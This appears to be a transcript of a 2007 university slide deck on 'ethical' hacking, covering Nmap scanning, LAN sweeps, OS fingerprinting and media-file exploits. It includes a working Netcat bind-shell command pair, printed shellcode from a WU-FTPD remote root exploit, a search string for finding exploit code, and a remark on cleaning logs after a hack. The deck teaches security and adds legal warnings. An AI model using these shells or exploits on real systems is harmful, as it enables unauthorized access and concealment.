Security & “Ethical” Hacking
Download
Report
Transcript Security & “Ethical” Hacking
Security & “Ethical”
Hacking
Luke Arntson
Central Washington University
Winter 2007
Presentation #2 – Advanced Scanning & Exploitation
Introduction
Again “Ethical” hacking
Do you Sniff before you taste?
Patience, persistence, some other motivational p
word…
Have phun, getting frustrated is normal
About Me
Overview
Advanced scanning with NMAP (as seen in
the Matrix)
Local IP Sweeping & its importance
Netcat rooting, a simple shell
Identify Station ( operating system )
Brief Exploit talk & Shell code
Exploits via Jpgs, Pngs, Mp3s, etc.
Conclusion
Advanced Scanning (NMAP)
Ok, we have acquired an IP (or range of)
and we want to find out some information
about this system.
We will use a very popular program
named Nmap.
Almost every Linux install its packaged,
Windows you will need to download Nmap
and the Win-Pcap files.
Advanced Scanning (NMAP)
Lets look at some of the information
techniques provided by nmap
SCAN TECHNIQUES:
-sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans
-sU: UDP Scan
-sN/sF/sX: TCP Null, FIN, and Xmas scans
--scanflags <flags>: Customize TCP scan flags
-sI <zombie host[:probeport]>: Idlescan
-sO: IP protocol scan
-b <ftp relay host>: FTP bounce scan
We will be using another scan technique
to probe open ports and determine
service/versions in use: -sV
Advanced Scanning (NMAP)
So lets run a -sV scan along with -v for verbose and -O
for OS detection
Advanced Scanning (NMAP)
So lots of gibberish, but we can sort
through this for VERY important details!
First: we have all of the open ports, along
with what versions they are running! Port
139.. Very interesting.
Second: we also found out the operating
system! Windows 98 SE… that will be
later.
Protection from NMAP
Keep those firewalls up if you’re not a
server and you’re not hosting.
There is not much you can do.. and NMAP
can be extremely stealthy using advanced
techniques.
It is scary how much information can be
acquired about you by a simple sniff and
run.
Local IP Sweeping
The LAN is the weakest network generally
Open ports, open boxes, free IPs, easy
sweeps
Vast majority of people feel other
computers within the LAN are not hackers,
but compromise a wireless router & bam…
Using Angry IP Scanner Again!
Angry IP Scanner; Its script kiddie, but it works
very well, and is faster than NMAP
Lets grab our local IP on the network, and begin
our scan, so we are currently 192.168.5.100,
and we know our range is 192.168.5.*
Use Angry IP Scanner just to find available peers
on the network, this is VERY useful for a
compromised wireless router or compromised
system on a router
We Have Local Victims!
Okay, we have local victims, we can now
use Nmap on each victim.
Nmap will also bypass firewalls given
enough time with the –P0 option.
Once we know operating systems, open
ports, we can use online security search
tools such as www.securityfocus.com and
locate exploits!
Importance of Local Sweeps
Compromised routers = compromised
systems, vulnerable on the inside only.
Apply a full control root kit to a computer
behind a router, and you have LAN
access… hence local IP sweeping
Viruses often spread within a network
(commercial, government, etc.) using LAN
sweeps
Netcat Rooting (Simple Shell)
Ok, we want to see what kind of access a shell
really has on a system.
Shell referring to a command prompt window on
another computer.
Netcat is a very useful UDP/TCP raw
client/server that can also double as a nice shell.
A windows version is free to download, Linux
generally comes with NC in the shell already.
Client/Server
Determine which computer you want to have a
shell on, and put nc.exe somewhere on there.
Next run nc.exe with the following parameters:
nc.exe –l –p 666 –e “cmd.exe”
This will execute Netcat to listen on port 666,
and when connected, it will execute and send
the output of cmd.exe on the server.
Client Connection
Client now connects to the server using
the corresponding line:
nc.exe 192.168.77.2 666
And Viola! Netcat shell over the network.
Why Netcat Root?
A nice way to make your first root, easy to
expand on this.
Potential is HUGE when the –e “???” command is
used.
Netcat is open source, so you can venture the
source code to understand how exactly Netcat
does this.
This also works in Unix, just replace cmd.exe
with a Unix shell ;)
Identify Station
Continuation of Nmap OS discovery
Once we have found a target, what kind
of operating system is it running?
Nmap -O command will usually show you,
unless the computer has a firewall on.
Importance of OS ID
Exploiting and choice of exploits/roots is always
dependent on the type of OS
Do we want to look for likely exploits, find a
more aggressive approach, or leave it.
For example, Linux servers often have a SSH server
open, we can either nmap –sV and exploit, or try to
bruteforce.
Need to know what we are trying to hack,
especially when cleaning up after a successful
hack (log files, email reports of floods /
bruteforce, rootkits, etc.)
Brief Exploits & Shell Code
Exploits come in all sorts of languages &
sizes. Some are simple run once on an IP,
others have various options and offsets.
Exploits are used as a way of getting into
a system, shell code is what happens
AFTER the exploit is successful.
Shell code will always vary with
experienced hackers, as they will always
have useful shells on hand.
Example Shellcode used by WUFTPD
2.6.0 REMOTE ROOT EXPLOIT
char linuxcode[]= /* Lam3rZ chroot() code */
"\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x31\xdb"
"\x43\x89\xd9\x41\xb0\x3f\xcd\x80\xeb\x6b\x5e\x31\xc0\x31"
"\xc9\x8d\x5e\x01\x88\x46\x04\x66\xb9\xff\xff\x01\xb0\x27"
"\xcd\x80\x31\xc0\x8d\x5e\x01\xb0\x3d\xcd\x80\x31\xc0\x31"
"\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9\x31\xc0\x8d"
"\x5e\x08\xb0\x0c\xcd\x80\xfe\xc9\x75\xf3\x31\xc0\x88\x46"
"\x09\x8d\x5e\x08\xb0\x3d\xcd\x80\xfe\x0e\xb0\x30\xfe\xc8"
"\x88\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0"
"\x31\xdb\xb0\x01\xcd\x80\xe8\x90\xff\xff\xff\xff\xff\xff"
"\x30\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31";
This is machine code, used to give specific calls in Linux
that will call chroot() and give the hacker a shell on the
vulnerable system.
This is public knowledge, just type the following in
Google:
wuftpd exploit filetype:c
More on Shells Later
Creating shells is an entirely different topic, and
we will go into how they actually figure out
which machine code to use and where to inject
this in a later presentation.
Shells are scary to look at because if you do not
know the machine code or the system its
intended for, there is absolutely no way to know
what its doing, but it can compromise a system!
Exploits via Jpg, Pngs, Mp3s
Exploits come in many varieties, as it just
takes a stray string call or a bad size check
to make a program vulnerable.
All sorts of formats have been vulnerable,
for example the famous GDI+ Jpg
vulnerability that would execute code just
by viewing a jpg!
GDI+ Jpg vulnerability
Posted on Sept. 30, 2004
“In the exploit attempts against AIM users, intruders
post a copy of an infected JPEG image to their user
profile and then send instant messages to other AIM
users enticing them to view that profile. When someone
views such a profile and the JPEG image loads the
viewing user's computer is then infected.
Still other exploits have been discovered. According to
Symantec two other Trojans, “Moo” and “Backdoor.Roxe”
are spreading although neither appears to have spread
to more than 50 computers at the time of this writing. “
– Mark Joseph Edwards
http://www.windowsitpro.com/Articles/ArticleID/44075/44075.html?Ad=1
Exploits via Jpg, Pngs, Mp3s
Other vulnerabilities in the form of Pngs
and Mp3s have come into the wild.
One Mp3 would use the header to execute
a shell in Winamp when the meta-data
was loaded.
A Png exploit in MSN Messenger would
allow hackers to put shellcode in a Png
and display it as a buddy icon to other
users.
Just because its media…
Just because you’re viewing a jpg, png,
mp3, wmv, you could still be running
something that exploits your computer.
Many people think exploits come in very
limited forms of scripts, tcp/udp injections
or executables, but there are many ways
in.
Resources
If this type of information interests you, there
are many safe online resources.
www.hackthissite.org - a friendly playground for
web hackers
www.phrack.org - a very good place for random
articles with great pieces of info
www.securityfocus.com - some of the best upto-date info about vulnerabilities and exploits.
Conclusion
Again, I emphasize just because I’m showing
you this, does NOT make it legal.
In fact, scanning government systems with NMAP and
getting caught can land you with fines & possible jail
time. Running exploits with shellcode you do not trust
could be potentially exposing your test system to a
wild virus or backdoor you do not know about.
Remember, finding exploits that work is tedious,
not everything you find online works every time.
Setup a fun box (something like Mandrake) and
install some vulnerable software on there. See if
you can break into it. Ex. Wuftpd 2.60. Have
fun, it takes work so don’t give up!
Thank You For Your Time!
Feel free to email me any
questions/comments at
[email protected]